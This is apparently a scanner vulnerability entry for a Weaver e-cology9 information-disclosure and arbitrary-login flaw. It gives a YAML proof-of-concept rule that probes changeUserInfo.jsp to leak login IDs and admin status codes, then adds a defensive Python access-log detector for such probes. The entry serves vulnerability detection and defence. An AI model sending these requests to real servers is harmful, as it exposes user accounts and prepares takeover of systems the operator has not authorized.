ecology-changeuserinfo-info-leak: Weaver (泛微) e-cology changeuserinfo information disclosure

Date: 2025-09-01 | Affected software: Weaver e-cology | PoC: public

Vulnerability description

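Weaver e-cology9 contains an information disclosure vulnerability and an arbitrary user login vulnerability. A remote attacker can chain the two to log in as any user in the system.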

PoC code [public]

id: ecology-changeuserinfo-info-leak

info:
  name: 泛微 e-cology changeuserinfo 信息泄露
  author: Chaitin
  severity: high
  verified: true
  description: |
    泛微e-cology9中存在信息泄露及任意用户登录漏洞,远程攻击者可利用两个漏洞组合任意登录系统中的用户
  reference:
    - https://mp.weixin.qq.com/s/Rhk7DaiL_YgqzaRwahDmjw
  solutions: 泛微e-cology9
  tags: ecology
  created: 2023/06/28

rules:
  r0:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=1
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r1:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=2
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r2:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=3
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r3:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=4
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r4:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=getLoginid&mobile=5
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"loginId":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r5:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=status&loginId=admin
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"code":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
  r6:
    request:
      method: GET
      path: /mobile/plugin/changeUserInfo.jsp?type=status&loginId=test
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"code":') &&
      response.body.bcontains(b'"status":"1"') &&
      !response.body.bcontains(b'"code":"-1"')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6()
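
A defender-side counterpart to the rule above, added here as an example and not part of the original PoC: it scans web access logs for requests to the endpoint and `type` values the rule probes, and flags sources that try several `mobile` or `loginId` values. The combined log format, the function names, the threshold and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/mobile/plugin/changeuserinfo.jsp"   # path from the rule, lowercased
VALUE_PARAM = {"getloginid": "mobile", "status": "loginid"}  # type -> probed parameter

# Assumption: Apache/Nginx "combined" access log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')

def find_probes(lines):
    """Return (ip, type, probed value, status) for requests matching the rule's paths."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        # Decode, drop ";path-params" and fold case so trivial variants still match.
        path = unquote(url.path).split(";", 1)[0].lower()
        if path != ENDPOINT:
            continue
        qs = {k.lower(): v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
        kind = qs.get("type", "").lower()
        if kind in VALUE_PARAM:
            hits.append((ip, kind, qs.get(VALUE_PARAM[kind], ""), int(status)))
    return hits

def enumerating_sources(hits, threshold=3):
    """IPs that probed at least `threshold` distinct mobile/loginId values."""
    seen = defaultdict(set)
    for ip, kind, value, _ in hits:
        seen[ip].add((kind, value))
    return sorted(ip for ip, vals in seen.items() if len(vals) >= threshold)

# Constructed sample log lines (documentation IP ranges, made-up sizes).
_P = "/mobile/plugin/changeUserInfo.jsp"
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Sep/2025:10:00:01 +0800] "GET {_P}?type=getLoginid&mobile=1 HTTP/1.1" 200 58 "-" "-"',
    f'203.0.113.7 - - [01/Sep/2025:10:00:02 +0800] "GET {_P}?type=getLoginid&mobile=2 HTTP/1.1" 200 58 "-" "-"',
    f'203.0.113.7 - - [01/Sep/2025:10:00:03 +0800] "GET {_P}?type=getLoginid&mobile=3 HTTP/1.1" 200 58 "-" "-"',
    f'203.0.113.7 - - [01/Sep/2025:10:00:04 +0800] "GET {_P}?type=status&loginId=admin HTTP/1.1" 200 40 "-" "-"',
    '198.51.100.20 - - [01/Sep/2025:10:05:00 +0800] "GET /mobile/plugin/ChangeUserInfo.jsp;x=1?type=status&loginId=test HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.10 - - [01/Sep/2025:10:06:00 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    probes = find_probes(SAMPLE_LOG)
    print(probes, enumerating_sources(probes))
```

A 200 status on these requests only shows that the endpoint answered; the rule's actual match conditions are on the response body, which access logs do not record.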
